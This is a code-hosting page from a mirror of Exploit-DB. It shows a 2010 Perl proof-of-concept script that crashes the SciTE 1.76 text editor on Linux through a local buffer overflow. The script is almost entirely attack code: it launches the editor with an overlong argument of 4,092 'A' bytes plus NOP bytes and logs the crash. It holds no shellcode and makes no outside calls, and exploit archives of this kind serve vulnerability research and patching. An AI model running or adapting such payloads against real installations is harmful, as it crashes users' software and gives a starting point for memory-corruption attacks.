bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/dos/14083.pl
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

51 lines
No EOL
1.3 KiB
Perl
Executable file
Raw Permalink Blame History

# Exploit Title: Scite text editor :Local Buffer Overflow (PoC)
# Date: 28/06/2010
# Author: kmkz
# Version: [Scite 1.76 (lastest version)
# Tested on: Linux 2.6.31-22
# Code : Proof of Concept
#!/usr/bin/perl -wU
# 0-Days PoC (Local BoF Scite 1.76)
use strict;
use diagnostics;
use English \'-no_match_vars\';
use constant SUCCESS=>(1);
use constant FAILLURE=>(0);
use constant TARGET_BINARY=>(\"scite\");
use constant PAYLOAD=>(`perl -e \'print \"A\"x4092 . \"\\x90\\x90\\x90\\x90\"\'`);
use constant VERSION =>(\"/usr/share/scite/SciTE.html\");
BEGIN:
if(-e VERSION)
{
foreach(VERSION)
{
my @version_checking=($_=~ //);
@version_checking=split(/W/);
next if !($\' =~ m/1.76/) || warn (\"[*] WARNING: not Scite Version 1.76 \\012\\012\");
}
my $Exploitation=(system( TARGET_BINARY, PAYLOAD));
open (DUMP ,\">> Dump_Scite_Local_BoF_PoC.log\") or warn(\"[-] Can\'t create dump_file\\012\\015\");
printf(DUMP\" [+] This PoC generate a .txt document and crash scite exploiting a local Buffer Overflow (just for example) \\012\\012\\015\");
printf(\"%s\\012\", $Exploitation ) ;
printf(DUMP\"[+] Run in GDB for more information (using this payload):\\012 %s\", PAYLOAD);
close(DUMP);
exit(SUCCESS);
}
else
{
printf(\"[!] %s : MISSING \\012 [!] %s \\012\\012\",VERSION,$!);
exit(FAILLURE);
}
Reference in a new issue View git blame Copy permalink